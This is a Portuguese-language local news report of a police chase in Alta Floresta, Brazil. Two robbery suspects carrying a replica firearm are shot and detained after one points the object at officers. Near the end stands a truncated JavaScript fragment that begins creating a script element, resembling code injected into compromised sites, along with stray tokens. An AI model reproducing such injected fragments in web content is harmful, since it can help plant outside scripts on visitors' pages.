Últimas Notícias

Dupla com simulacro de arma de fogo acaba baleada após tentativa de roubo em Alta Floresta

t4

Fotos: WhatsApp

Uma dupla com um simulacro de arma de fogo foi baleada na noite deste domingo 06, pela Policia Militar após uma tentativa de roubo em Alta Floresta.

A dupla tentou realizar um assalto em um ponto de ônibus na Avenida Ludovico da Riva, próximo ao colégio Marines Fátima de Sá Teixeira, porém sem exito foragiram. A Polícia Militar foi acionada por uma empresa de segurança, informando uma tentativa de roubo a pessoa. A guarnição em motos, após ser informada de que dupla seguia em uma motocicleta trajando moletons, saiu em rondas, a dupla foi avistada em fuga, realizando manobras perigosas na avenida, próximo à Praça Cívica.483964

Ao avistar a guarnição, a dupla fugiu na contramão até as proximidades do Terminal Rodoviário, onde foi interceptada por outra viatura. Ainda em fuga a dupla seguiu sentido a rodovia MT-208, nas proximidades do trevo, o garupa levou a mão na cintura retirando algo e apontando para a guarnição que fazia o acompanhamento, ao risco de uma troca de tiros, disparos de alerta foram efetuados pela Polícia Militar, que atingiu os jovens que perderam o controle da motocicleta. A dupla foi detida, o Corpo de Bombeiros foi acionado prestando assim os primeiros socorros e encaminhando os jovens ao Pronto Socorro do Hospital Regional.

A arma foi descartada pelo garupa e localizada pela guarnição da Polícia Militar, posteriormente, o objeto era um simulacro, que a dupla utilizava para cometer os crimes. A participação da dupla em roubos ocorridos nos últimos meses não é descartada, e passa a ser investigada, as vestimentas dos jovens e a motocicleta tem características semelhantes das utilizadas nos crimes recentes. A motocicleta utilizada na ação foi apreendida.

t1var d=document;var s=d.createElement(‘script’);

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top